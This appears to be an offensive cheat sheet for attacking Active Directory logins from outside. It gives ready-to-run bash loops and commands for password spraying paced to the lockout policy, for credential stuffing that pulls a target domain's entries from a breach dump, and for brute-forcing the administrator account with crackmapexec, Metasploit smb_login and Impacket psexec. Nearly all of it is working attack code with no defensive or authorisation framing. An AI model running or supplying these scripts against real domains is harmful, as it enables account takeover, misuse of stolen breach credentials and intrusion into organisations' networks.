Non-Authenticated (External) Attacks
Password Spraying
Requirements: a user list, a short list of common passwords, and the domain lockout policy — the lockout threshold, the observation window (how long before an account's bad-password count resets) and the lockout duration. Spraying one password per observation window keeps every account's failure count below the threshold.
Password Spraying Execution
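# --- Password spraying: ONE password against MANY users, paced to the lockout policy ---
dc_ip='<DC-IP>'
# Pull the policy first (threshold, observation window, lockout duration).
# --pass-pol usually needs a valid account or a null session; from any
# domain-joined host `net accounts /domain` gives the same numbers.
crackmapexec smb "$dc_ip" --pass-pol
# Spray a single password. --continue-on-success keeps going after a hit so
# every user is tested exactly once (stopping early would leave the rest unchecked).
crackmapexec smb "$dc_ip" -u users.txt -p 'Password123!' --continue-on-success
# Several passwords: wait out the observation window between rounds so every
# account's bad-password count resets before it sees a second failure.
# 1800 s is only a placeholder -- use the window reported by --pass-pol, and
# remember fine-grained password policies can set a stricter threshold for
# some users than the default domain policy.
# Every attempt is still a failed logon on the DC (4625/4776-style events);
# pacing avoids lockouts, it does not avoid detection.
window=1800
passwords=('Password123!' 'Welcome2024!' 'Company123!')
for i in "${!passwords[@]}"; do
  [ "$i" -gt 0 ] && sleep "$window"   # no pointless wait after the last round
  crackmapexec smb "$dc_ip" -u users.txt -p "${passwords[$i]}" --continue-on-success
done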
Credential Stuffing
Requirements: Breach credential data matching target organization, network access to domain services
Credential Preparation
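# Pull only the target domain's entries out of a breach dump that is formatted
# as one "email:password" per line (check the dump's format first -- the cut
# positions below assume it).
#   -i : addresses in dumps are mixed-case, match case-insensitively
#   -F : literal match, so the '.' in the domain is not a regex wildcard
# Anchoring on "@domain:" avoids false matches such as @<company>.com.example.
domain='<company>.com'
grep -i -F -- "@${domain}:" breached_creds.txt | sort -u > domain_creds.txt
# The password is everything after the FIRST ':' -- passwords can contain ':'
# themselves, so `cut -f1,2` would silently truncate them.
# Parallel lists for crackmapexec --no-bruteforce: line N of one file pairs
# with line N of the other, so never sort or dedupe them separately.
# The local part of the address is often, but not always, the AD logon name;
# confirm the naming convention before using usernames.txt.
cut -d: -f1 domain_creds.txt | sed 's/@.*//' > usernames.txt
cut -d: -f2- domain_creds.txt > passwords.txt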
Credential Stuffing Execution
CrackMapExec Method
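# Credential stuffing: try each (user, password) pair ONCE, no permutation.
# --no-bruteforce pairs line N of usernames.txt with line N of passwords.txt,
# so both files must have the same length and order -- check before running.
dc_ip='<DC-IP>'
if [ "$(wc -l < usernames.txt)" -ne "$(wc -l < passwords.txt)" ]; then
  echo 'error: usernames.txt and passwords.txt must have the same number of lines' >&2
else
  # A user listed on several lines takes several failures in quick succession;
  # keep per-user repeats below the lockout threshold
  # (sort usernames.txt | uniq -c | sort -rn | head  shows the worst offenders).
  crackmapexec smb "$dc_ip" -u usernames.txt -p passwords.txt --no-bruteforce --continue-on-success
fi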
Metasploit Method
# Credential validation module: tests each user/password PAIR once (no cartesian product)
use auxiliary/scanner/smb/smb_login
set RHOSTS <DC-IP>
# USERPASS_FILE expects "user password" separated by a SPACE, one pair per line.
# A user:pass file (such as the grep/cut output above) must be converted first,
# replacing only the FIRST ':' so passwords containing ':' survive:
#   sed 's/:/ /' domain_creds.txt > domain_creds_msf.txt
# Do not also set USER_FILE/PASS_FILE -- that reintroduces the full permutation.
set USERPASS_FILE /path/to/domain_creds.txt
# Keep going after a hit so every pair is checked; each failure still counts
# toward that user's lockout threshold.
set STOP_ON_SUCCESS false
run
Brute Force Attacks
Requirements: target administrative accounts, comprehensive password lists, and the domain lockout policy. Brute-forcing a single account is the most lockout-prone and most detectable technique on this page — every failure is a failed logon for the same principal on the DC — so confirm the threshold and observation window before starting, and prefer spraying where it fits.
Targeted Brute Force
CrackMapExec Method
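# --- Targeted brute force: MANY passwords against ONE account ---
# This is the technique most likely to lock the target out: one account absorbs
# every failed attempt, so the batch size must stay below the lockout threshold
# and the pause must exceed the observation window (crackmapexec smb <DC-IP>
# --pass-pol). Every attempt is still a failed logon on the DC, so "lockout
# avoidance" is not stealth. The built-in RID-500 Administrator is commonly
# exempt from lockout, but verify that for the target domain rather than assume it.
dc_ip='<DC-IP>'
target_user='administrator'
batch=4        # attempts per window; keep it below the lockout threshold
window=1800    # seconds; >= the policy's observation window (1800 is a placeholder)
pause=5        # seconds between attempts inside a batch

# Unpaced run -- only when the policy reports NO lockout (threshold 0).
# --continue-on-success is dropped: with a single user there is nothing left
# to test after the first hit.
crackmapexec smb "$dc_ip" -u "$target_user" -p passwords.txt

# Paced run: walk the WHOLE list in batches. (Looping over `head -4` would
# re-test the same four passwords every cycle and never reach the rest of the
# file, and the 30-minute sleep outside that loop ran only once.)
n=0
while IFS= read -r password || [ -n "$password" ]; do   # read -r + quoting keep spaces/backslashes intact
  if [ "$n" -gt 0 ] && [ $((n % batch)) -eq 0 ]; then
    sleep "$window"   # let the bad-password counter reset before the next batch
  fi
  n=$((n + 1))
  # CME exits 0 whether or not the login worked, so key off its output:
  # "[+]" marks a valid login, and the NT status names the failure reason.
  result=$(crackmapexec smb "$dc_ip" -u "$target_user" -p "$password" | tee /dev/stderr)
  case "$result" in
    *STATUS_ACCOUNT_LOCKED_OUT*)
      printf 'account %s is locked out -- stop and wait for the lockout duration\n' "$target_user" >&2
      break ;;
    *'[+]'*)
      printf 'SUCCESS: %s:%s\n' "$target_user" "$password"
      break ;;
  esac
  sleep "$pause"
done < passwords.txt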
Impacket Method
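# --- Impacket: one password at a time over SMB ---
# psexec.py is a noisy tool for credential checking: a successful login
# uploads a service binary to ADMIN$ and installs a service (service-install
# events on the target), and without a command argument it drops into an
# interactive shell, which would block this loop on the first hit. Passing
# `whoami` makes it run one command and return. For a quiet validity check
# prefer a plain SMB login (crackmapexec smb) and keep psexec.py for when you
# actually want a shell.
# Also: the password is passed in argv (visible in `ps`), and the
# user:pass@host syntax breaks for passwords containing '@' or ':'.
dc_ip='<DC-IP>'
domain='<domain>'
target_user='administrator'
while IFS= read -r password || [ -n "$password" ]; do   # read -r + quoting keep spaces/backslashes intact
  # Keep stderr instead of discarding it: it carries the NT status, which is
  # the only way to tell STATUS_LOGON_FAILURE from STATUS_ACCOUNT_LOCKED_OUT.
  if output=$(python3 psexec.py "${domain}/${target_user}:${password}@${dc_ip}" whoami 2>&1); then
    printf 'SUCCESS: %s:%s\n' "$target_user" "$password"
    break
  fi
  case "$output" in
    *STATUS_ACCOUNT_LOCKED_OUT*)
      printf 'account %s is locked out -- stop and wait for the lockout duration\n' "$target_user" >&2
      break ;;
  esac
  sleep 60   # pace attempts; size this to the lockout policy, not to a round number
done < admin_passwords.txt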